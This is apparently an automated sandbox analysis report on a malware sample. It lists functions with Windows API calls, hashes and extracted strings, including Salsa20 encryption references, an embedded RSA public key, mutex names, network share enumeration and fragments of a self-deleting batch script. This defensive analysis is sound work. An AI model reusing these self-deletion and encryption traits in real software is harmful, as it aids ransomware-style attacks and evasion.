                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: efd8ad2b34b0f765e59da3d299a3a6ce0227c9048f29603ba3a380012e7353a5
                                                                                                        • Instruction ID: 048cff08e7ae07db3c2925cca23a51bbdae6d128c6e7d5a630644ebd46ff6185
                                                                                                        • Opcode Fuzzy Hash: efd8ad2b34b0f765e59da3d299a3a6ce0227c9048f29603ba3a380012e7353a5
                                                                                                        • Instruction Fuzzy Hash: A4D0A7323493357BE3140AA9AC07F877ADCCF15B10F40403BB609DA1C0D5E1F81096D8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FD80 Relevance: 1.5, APIs: 1, Instructions: 18windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F20BD0: WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00F20C12
                                                                                                        • SendMessageW.USER32(?,00008004,00000000,00000000), ref: 00F2FDA4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumMessageOpenSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1835186980-0
                                                                                                        • Opcode ID: 8f487d47ea922f21354624a8933528f57c63e897534ee9a3b4e363465efeed23
                                                                                                        • Instruction ID: 1bdf5440274b5f8af9abacbadc6b3050a6ef2e2e126ec75a438225ff0777ce3a
                                                                                                        • Opcode Fuzzy Hash: 8f487d47ea922f21354624a8933528f57c63e897534ee9a3b4e363465efeed23
                                                                                                        • Instruction Fuzzy Hash: EAE012311457546AD72197A4DC05B86BBD49F19724F00C81AE69AAB981C5A1B00496E9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F33B43 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F33B64
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 501242067-0
                                                                                                        • Opcode ID: 9588ccac5c8f7a2144263ff7b8086ff886a1469085267b0fadebf5976201fdf8
                                                                                                        • Instruction ID: 59444be1e54e427e1800218a7fbc6edd5b951753e0d18817ce075c26178f6f91
                                                                                                        • Opcode Fuzzy Hash: 9588ccac5c8f7a2144263ff7b8086ff886a1469085267b0fadebf5976201fdf8
                                                                                                        • Instruction Fuzzy Hash: 16D0222190848D96FF22B13D4C538B8BF14C903170F1403EAEC8985453CC024519A642
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FDC0 Relevance: 1.5, APIs: 1, Instructions: 16threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,01039230), ref: 00F2FDD6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: edb35fd375ea5c321c3d7dfd8268d1b53d1b8e9a363aa94b24e80011f1f834d0
                                                                                                        • Instruction ID: a426b186552aa0b1f1ff9966edf082a261ab4253d2b5e041319bc15db89d125a
                                                                                                        • Opcode Fuzzy Hash: edb35fd375ea5c321c3d7dfd8268d1b53d1b8e9a363aa94b24e80011f1f834d0
                                                                                                        • Instruction Fuzzy Hash: 56D0A93138931A77E3000AA6AC43F093A9C8718B00F80003AB244D81C0DAE2E010AA5C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F320B6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __fsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3646066109-0
                                                                                                        • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                        • Instruction ID: 36a2652bab3f619629b61fb4de5fd57f0e68ce45500ca9f051626841b258c2d2
                                                                                                        • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                        • Instruction Fuzzy Hash: FAB0927244020C77CF012E92EC02A493B19AB54760F048020FB1C18161E6BBE664A689
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F30FDD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wfsopen
                                                                                                        • String ID:
                                                                                                        • API String ID: 197181222-0
                                                                                                        • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction ID: 83aea763ee10046adddd2057c6130aa53921fdd966572d5e321cfb3be07ef3e9
                                                                                                        • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                        • Instruction Fuzzy Hash: FFB092B244020C77CE012A82EC02A493B19AB416A0F008020FB0C18161A677A6A0AA89
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F37F3D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _doexit.LIBCMT ref: 00F37F47
                                                                                                          • Part of subcall function 00F37E0E: __lock.LIBCMT ref: 00F37E1C
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(01017B08,0000001C,00F37CFB,00000000,00000001,00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E5B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E6C
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E85
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(-00000004,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E95
                                                                                                          • Part of subcall function 00F37E0E: EncodePointer.KERNEL32(00000000,?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37E9B
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37EB1
                                                                                                          • Part of subcall function 00F37E0E: DecodePointer.KERNEL32(?,00F37C49,000000FF,?,00F38B1A,00000011,00000000,?,00F350D7,0000000D), ref: 00F37EBC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2158581194-0
                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction ID: 97ccff28d8c60aa48329d1f1fadcbdcda5dcda6d069775e124362c29f2f1224e
                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                        • Instruction Fuzzy Hash: AFB012B198430C33DA213642EC03F053B0C4740B60F200070FA0C1C1E1A593B9A050C9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22900 Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00F22966
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 626452242-0
                                                                                                        • Opcode ID: bf3a5e84baf7486ea567efe3534a465196d7237f4677fe669709c9ba300ba886
                                                                                                        • Instruction ID: 8278f57f6ff64d3ddcf5e6a7110220a79cc08cf45bd8c33d34d9bb79e9b528ba
                                                                                                        • Opcode Fuzzy Hash: bf3a5e84baf7486ea567efe3534a465196d7237f4677fe669709c9ba300ba886
                                                                                                        • Instruction Fuzzy Hash: D411BE71A01229EBDB00DF59DC41BDFBBA8EF05724F004129F819A7280C77A9A15DBD6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00F482A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcscmp.LIBCMT ref: 00F482B9
                                                                                                        • _wcscmp.LIBCMT ref: 00F482CA
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00F48568,?,00000000), ref: 00F482E6
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00F48568,?,00000000), ref: 00F48310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 1351282208-711371036
                                                                                                        • Opcode ID: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction ID: 3ecd29be6da16623616787b7b7761200d1883f053bb28d77389b1014961c3548
                                                                                                        • Opcode Fuzzy Hash: faf33b4fde292ef0379bda4de5632ae41479b707e3961a7339c999803269385d
                                                                                                        • Instruction Fuzzy Hash: 9B014431A05616AAD7119E58DC45FDE3F99AB05BA5F008015FE04DA051FFB0DB42F7D4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F29E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk, xrefs: 00F29EC4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnu0nG7aeNA169GxkxNjX\\neNRPybTqmtjleCFNjJGArz4ioIdV0UkKIk
                                                                                                        • API String ID: 2102423945-2415271991
                                                                                                        • Opcode ID: c91f066040b15bac0ef4d5de21fbd094c9b5496f663ada4d07d9c07c70b9796f
                                                                                                        • Instruction ID: 2b22f12ca91f3fc0742e55a493cacf0cd4ead4d1569cf8a072cab026fb1f8216
                                                                                                        • Opcode Fuzzy Hash: c91f066040b15bac0ef4d5de21fbd094c9b5496f663ada4d07d9c07c70b9796f
                                                                                                        • Instruction Fuzzy Hash: 95F03930688B5065F3709B50FC16B153A91731AB08F200048E2C41E2D6D3FF2148E39D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 00F1C090
                                                                                                        • input != nullptr && output != nullptr, xrefs: 00F1C095
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __wassert
                                                                                                        • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                        • API String ID: 3993402318-1975116136
                                                                                                        • Opcode ID: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction ID: de06a94da523d87b2abf2ff87c6902075d69443e2c982f1015c6f4912b0a6f63
                                                                                                        • Opcode Fuzzy Hash: 3ae4ddc2b7fa20cd13afabebd1a95491edd6d3546f55db01dd4af2da2fb07ac2
                                                                                                        • Instruction Fuzzy Hash: 97C18E75E003499FCB54CFA9C885ADEFBF1FF48310F24856AE919E7201E334AA558B94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F224E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00F224FE
                                                                                                        • GetLastError.KERNEL32 ref: 00F22509
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2251C
                                                                                                        • CloseHandle.KERNEL32 ref: 00F22539
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00F22550
                                                                                                        • GetLastError.KERNEL32 ref: 00F2255B
                                                                                                        • CloseHandle.KERNEL32 ref: 00F2256E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                        • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                        • API String ID: 2372642624-488272950
                                                                                                        • Opcode ID: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction ID: 9288ad868330e6beb3553e169c152616d8c298ca4c49b665ccee4b1b562e3688
                                                                                                        • Opcode Fuzzy Hash: 7b9c1b3bb6bf322fd536fd6f85fd3ee843b462960028e042f53b856396b5b4dd
                                                                                                        • Instruction Fuzzy Hash: C0719F7294021DABDB20DBB0EC89FEA77ADFB44300F004596F649D6050DB799A88DFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
